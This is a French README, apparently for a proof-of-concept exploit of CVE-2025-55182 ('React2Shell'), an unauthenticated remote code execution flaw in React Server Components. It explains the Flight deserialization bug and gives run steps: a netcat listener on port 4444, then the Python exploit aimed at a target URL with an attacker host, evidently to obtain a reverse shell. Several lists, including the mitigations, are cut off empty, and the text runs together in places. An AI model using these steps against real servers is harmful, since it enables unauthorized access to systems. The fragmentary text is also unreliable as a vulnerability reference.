Preuve de concept d'exploit pour CVE-2025-55182 (React2Shell), une vulnérabilité d'exécution de code à distance non authentifiée dans les composants serveur React via des charges utiles de protocole Flight conçues.
CVE-2025-55182, également connue sous le nom de React2Shell, est une vulnérabilité critique d'exécution de code à distance (RCE) non authentifié affectant les packages React Server Components (versions 19.0, 19.1.0, 19.1.1 et 19.2.0).
Cette vulnérabilité peut permettre à des attaquants d'exécuter du code arbitraire sur les serveurs vulnérables via une seule requête HTTP spécialement conçue, sans nécessiter d'authentification.
React Server Components utilisent le protocole Flight pour sérialiser et désérialiser les données des composants échangées entre le client et le serveur.
Une validation insuffisante lors de ce processus de désérialisation peut permettre à des charges utiles spécialement conçues de manipuler les structures d'objets internes et d'atteindre des primitives d'exécution JavaScript dangereuses.
La vulnérabilité provient d'une validation insuffisante lors de la désérialisation des charges utiles du protocole Flight de React Server Components (RSC).
Des charges utiles spécialement conçues peuvent :
multipart/form-data spécialement conçueLancez un écouteur sur votre machine :
nc -lvnp 4444
Exécutez l'exploit :
python3 CVE-2025-55182-React2Shell.py <TARGET_URL> <LHOST>
python3 CVE-2025-55182-React2Shell.py http://192.168.56.101:3000/ 192.168.56.100
Pour atténuer cette vulnérabilité :
Ce projet est fourni strictement pour :
Les auteurs déclinent toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce matériel. Les utilisateurs sont seuls responsables du respect de toutes les lois et réglementations applicables.